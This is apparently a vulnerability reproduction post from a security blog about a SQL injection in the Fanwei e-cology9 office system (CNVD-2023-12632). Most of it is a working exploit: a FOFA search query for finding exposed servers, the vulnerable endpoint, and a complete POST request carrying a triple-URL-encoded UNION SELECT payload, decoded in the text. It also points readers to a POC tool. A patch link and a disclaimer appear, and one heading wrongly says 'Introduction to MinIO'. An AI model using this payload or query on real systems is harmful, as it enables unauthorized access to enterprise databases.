Article directory
Fanwei OA e-cology9 has sql injection
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Introduction to MinIO
WeChat official account search: Nanfeng Vulnerability Reappearance Library
This article was first published on the Nanfeng Vulnerability Reproduction Library official account
Fanwei E-Cology9 collaborative office system is an OA system based on JSP and SQL Server database, including knowledge document management, human resource management, customer relationship management, project management, financial management, workflow management, data center, etc. to create a collaborative and efficient Enterprise management environment, break through the barriers between various resources such as enterprise personnel, finance, material, information, process, etc. and other partners are integrated on a unified platform, turning the enterprise into an electronic organization with internal and external collaboration.
2. Vulnerability description
There is a SQL injection vulnerability in Fanwei ecology9, which can be exploited by attackers to obtain sensitive database information.
CVE ID:
CNNVD ID:
CNVD ID: CNVD-2023-12632
3. Affect the version
Fanwei e-cology V9 < 10.56
4. fofa query statement
app="Panwei-Collaborative Business System"
5. Vulnerability recurrence
Vulnerability link: http://127.0.0.1/mobile/plugin/browser.jsp
Vulnerability data package:
POST /mobile/plugin/browser.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: Keep-Alive
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 649
isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537
The value after the keyword parameter is
a' union select 1,''+(SELECT @@VERSION)+'
Obtained after three url encodings
Explode database version through injection vulnerability
6.POC&EXP
Follow the public account Nanfeng Vulnerability Reproduction Library and reply Vulnerability Reproduction 27 to get the POC tool download address:
7. Rectification opinions
The manufacturer has updated the patch, the repair plan: https://www.weaver.com.cn/cs/securityDownload.asp#